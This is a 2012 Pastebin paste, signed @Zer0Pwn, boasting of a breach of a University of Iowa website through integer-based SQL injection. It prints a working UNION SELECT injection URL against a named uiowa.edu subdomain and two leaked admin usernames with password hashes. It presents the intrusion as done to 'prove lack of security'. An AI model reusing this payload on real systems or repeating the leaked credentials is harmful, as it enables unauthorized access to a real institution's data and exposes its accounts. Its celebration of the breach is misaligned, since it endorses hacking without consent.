Advertisement
Guest User

University of Iowa BREACHED @Zer0Pwn

a guest
Jun 4th, 2012
365
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.08 KB | None | 0 0
  1. ______ ___ _____
  2. |___ / / _ \| __ \
  3. / / ___ _ __| | | | |__) |_ ___ __
  4. / / / _ \ '__| | | | ___/\ \ /\ / / '_ \
  5. / /_| __/ | | |_| | | \ V V /| | | |
  6. /_____\___|_| \___/|_| \_/\_/ |_| |_| @Zer0Pwn - Zer0Pwn
  7. #############################################
  8.  
  9. Today's was just a simple challenge.
  10. Took me a little while to figure out, but it was a good time.
  11.  
  12. #############################################
  13.  
  14. Target ==> University of Iowa
  15. URL ==> http://www.uiowa.edu/
  16. Reason ==> To prove lack of security in anything, and everything.
  17. Vulnerability ==> SQL Injection Integer Based
  18. MySQL Version ==> 4.
  19.  
  20.  
  21. #############################################
  22.  
  23. Username:Password
  24.  
  25. admin:3a6204ff69a6ac79
  26. adminpd:39891d7452c48ca1
  27.  
  28. Proof ==> http://old.iihr.uiowa.edu/people/othercopy.php?title=Recent Graduates&id=null UNION SELECT concat(username,0x3a,password),2,3 FROM people.admin--+-
  29.  
  30. NOTE: Data is not visible on the page, only in the source code.
  31.  
  32. Follow me on twitter @Zer0Pwn for more action.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement